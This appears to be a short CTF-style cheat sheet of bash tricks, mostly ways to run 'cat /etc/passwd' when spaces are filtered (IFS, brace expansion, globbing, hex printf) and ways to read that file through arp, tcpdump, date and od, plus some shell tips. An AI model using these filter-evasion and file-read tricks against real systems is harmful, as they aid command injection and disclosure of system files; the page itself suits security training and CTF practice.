bash-tricks

Space not allowed

different ways to run command cat /etc/passwd without space

$ {cat,/etc/passwd}
$ cat${IFS}/etc/passwd
$ cat${IFS:0:1}/etc/passwd
$ cat$IFS/etc/passwd
$ cat</etc/passwd>/tmp/outt
$ IFS=:;cat$IFS/etc/passwd
$ cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??      #  this is cat /etc/passwd

Bypass tricks

$ cat$(printf '\x20/etc/passwd')
$ C=cat; $C /etc/passwd
$ curl site.com/{1.php,2.php}         # will fetch both 1 & 2.php in 1 request

$ root@cb7435cd5cf3:/ctf# ls /root
 angr  bin ...

$ root@cb7435cd5cf3:/ctf# ls /roo*
 angr  bin ...
    
$ root@cb7435cd5cf3:/ctf# ls /roo?
 angr  bin ...

$ root@cb7435cd5cf3:/ctf# ls /roo[a-z]
 angr  bin ...

$ root@cb7435cd5cf3:/ctf# ls /roo{x,t}
 ls: cannot access '/roox': No such file or directory
 /root:
  angr  bin

The mysterious ^D(Ctrl + D)

LIke ^C , ^D is also used to Exit a program but ^D sends an EOF on standard input to exit the program while ^C uses SIGINT to exit.
Run perl in interactive mode and see it in action
```
 root@fc7e34d51219:/ctf# perl -
  print(23);
  print("hello??");
  print("hmmm");
```
If we use ^C it will exit normally without executing any, but using ^D will execute the commands. Now it’s not only with perl, many command line utilities follow same.

Local read file with Bash Commands

arp -v -f ‘/etc/passwd’
tcpdump -c 1 -vvvvvv -V ‘/etc/passwd’
date ‘+%s’ -f ‘/etc/passwd’
od /etc/passwd

Useful Commands

HTOP

htop/top command can be used to strace a process sys calls. Steps:

Run htop
Navigate to any process you want
Press ‘s’ . It will show strace of the corresponding process

Connect to server manually

HTTP : nc IP PORT
HTTPS : openssl s_client -connect site.com:443

PreviousDeepSeek Internal NextAndroid

Last updated 2 years ago